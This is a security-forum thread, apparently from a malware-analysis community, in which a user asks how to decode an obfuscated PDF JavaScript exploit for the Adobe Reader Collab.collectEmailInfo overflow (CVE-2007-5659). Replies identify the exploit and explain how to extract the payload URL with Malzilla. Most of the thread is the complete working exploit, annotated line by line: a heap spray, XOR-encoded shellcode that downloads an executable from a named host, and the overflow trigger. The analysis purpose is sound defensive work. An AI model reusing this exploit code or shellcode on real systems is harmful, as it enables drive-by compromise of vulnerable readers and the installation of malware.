Author Topic: Please help  (Read 3353 times)


September 20, 2010, 11:16:10 am

MADY

Could someone please tell me how to decode this code?


// Global array that holds the heap-spray blocks built by ooyS1YUR(); keeping them
// reachable presumably stops the strings from being garbage-collected before the trigger.
var mM6RItmK = new Array();



// Pads a seed string. HydurAUR is doubled by self-concatenation until it holds at
// least XbGQrcyY/2 JS characters, then cut to exactly XbGQrcyY/2. The sample counts
// two bytes per character (cf. `length * 2` in ooyS1YUR), so the result is treated as
// a XbGQrcyY-byte buffer; it is used to build the NOP sled of each spray block.
function yNYJ8yVD(HydurAUR, XbGQrcyY)

{

    while (HydurAUR.length*2<XbGQrcyY) {

        HydurAUR += HydurAUR;   // doubles each pass, so only O(log n) concatenations

    }



    HydurAUR = HydurAUR.substring(0,XbGQrcyY/2);   // trim the overshoot from the last doubling



    return HydurAUR;

}



// Heap spray. Builds ~48 strings of about 4 MB (0x400000 bytes) each, every one a
// 0x9090 NOP sled followed by the shellcode, so that the address 0x0c0c0c0c (the
// same value the caller stuffs into the overflowing msg argument) is very likely
// to point into a sled.
function ooyS1YUR()

{

    var jKts_E9h = 0x0c0c0c0c;   // spray target address; matches the %u0c0c filler in RYiFEs8K

    // Shellcode as %u-escaped 16-bit code units (each stored low byte first).
    // 43 43 43 43 is padding; the next bytes EB 0F / 5B / 33 C9 / 66 B9 80 01 /
    // 80 33 EF / 43 / E2 FA / EB 05 / E8 EC FF FF FF read like a jmp/call/pop stub
    // that XORs the following 0x180 bytes with 0xEF (hence the many 0xEF bytes) --
    // confirm in a disassembler. The trailing words from %u7468 ("ht") onwards are
    // plain ASCII and spell out a NUL-terminated download URL (cf. reply #1).
    var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");

    var Y9Ib6uuE = 0x400000;   // size of one spray block in bytes (4 MB)

    var xxKaKDUU = i0a7eJNL.length * 2;   // shellcode size in bytes (2 per code unit)

    // Sled size = block size - shellcode - 0x38. The 0x38 is presumably string/allocator
    // overhead so that each block is exactly one 4 MB allocation -- not verified here.
    var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);

    var HydurAUR = unescape("%u9090%u9090");   // sled seed: 0x90 is the x86 NOP



    HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);   // grow the seed to XbGQrcyY bytes

    // Block count: (0x0c0c0c0c - 0x400000) / 0x400000 ~= 47.2, so the loop below runs
    // 48 times (~192 MB in total) and the spray extends past 0x0c0c0c0c.
    var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

   

    for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {

        mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;   // sled + shellcode, parked in the global array


    }

}


// Version gate and trigger. Reads the viewer version through the Acrobat JavaScript
// API (app.viewerVersion), keeps the first three digits as major/minor/patch and, when
// the check considers the viewer older than 8.1.2, heap-sprays and then calls
// Collab.collectEmailInfo() with an oversized msg argument.
function RYiFEs8K()

{

    var XrCU20If = app.viewerVersion.toString();

    XrCU20If = XrCU20If.replace(/\D/g,'');   // drop dots etc., e.g. "8.1.1" -> "811"





    // Each entry is a one-character string; the == and < below coerce them to numbers.
    var TPWRJTZJ = new Array(

        XrCU20If.charAt(0),

        XrCU20If.charAt(1),

        XrCU20If.charAt(2));





    // Fires for 8.0.x, 8.1.0, 8.1.1, 7.0.x and any major below 7, i.e. everything the
    // check sees as < 8.1.2. NOTE(review): a two-digit major such as "10" is read as
    // major 1 here, so the spray also runs on viewers the check is meant to exclude.
    if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||

        (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||

        (TPWRJTZJ[0] < 7)) {

        ooyS1YUR();   // spray first so that 0x0c0c0c0c points into a NOP sled

        // Overflow payload: 0x0c0c code units doubled until >= 44952 (the loop stops at
        // 65536 units, 128 KB), so whatever gets overwritten presumably reads 0x0c0c0c0c.
        var nabGR_dc = unescape("%u0c0c%u0c0c");

        while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;

        // The oversized msg is what triggers CVE-2007-5659; the return value is stored on
        // `this` (presumably the document object in Acrobat JS) to keep a reference alive.
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});

    }

}



// Entry point: runs as soon as the embedded script executes (presumably from the
// PDF's document-level or OpenAction JavaScript).
RYiFEs8K();


September 20, 2010, 11:24:06 am
Reply #1

SysAdMini

This is a PDF exploit for CVE-2007-5659 (the Collab.collectEmailInfo() overflow in Adobe Reader/Acrobat; note that the version check in the script only fires for viewers below 8.1.2).

The URL in the shellcode is hxxp://aolcounter[.]com/ViWK67B/exe.php (defanged). It is stored unencoded at the end of the %u string, low byte first, which is why it is readable straight from the hex view.

The domain aolcounter.com no longer resolves (as of this reply), so the payload can't be fetched, but treat the URL as hostile anyway.

http://www.malwaredomainlist.com/mdl.php?search=aolcounter&colsearch=All&quantity=50&inactive=on

September 20, 2010, 12:04:14 pm
Reply #2

MADY

Thanks for your reply,

Could you please explain how to do this manually to find the URL in the shellcode? I tried Malzilla to decode it, but it only produced junk strings after running the unescape sequence.

Please help me find the URL in this code, since I am going to demonstrate it to our people.

Thanks in Advance,
MADY


September 20, 2010, 01:04:13 pm
Reply #3

GmG

Malzilla -> Misc Decoders tab:

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file



September 20, 2010, 01:34:35 pm
Reply #4

SysAdMini

malzilla -> misc decoders

paste
%u4343%u4343%u0feb%u335b....

concatenate
UCS2 to hex
hex to file

Instead of "Hex to file" I prefer to copy/paste the content into the "Hex view" tab.
In most cases you can see the URL at the end of the hex view.
If there is no URL, the shellcode is probably XOR-encoded. (In this sample the body appears to be XOR-encoded, but the URL is appended in clear text, which is why it shows up directly.)
In that case, enter "http" into the "Strings to find" field and click "Find".
If Malzilla finds the encoded string "http", it displays the XOR key in the "Key" field.
Click "Apply xor" and you will see the URL in the hex viewer.
This search only works for a single-byte XOR key; for anything else, step through the decoder stub in a debugger or a shellcode emulator. Do all of this on the extracted JavaScript text in an isolated VM -- there is no need to open the PDF in a vulnerable Reader.

September 21, 2010, 07:47:17 am
Reply #5

MADY

Thanks a lot, SysAdMini. You are the real Hero Member of MDL :)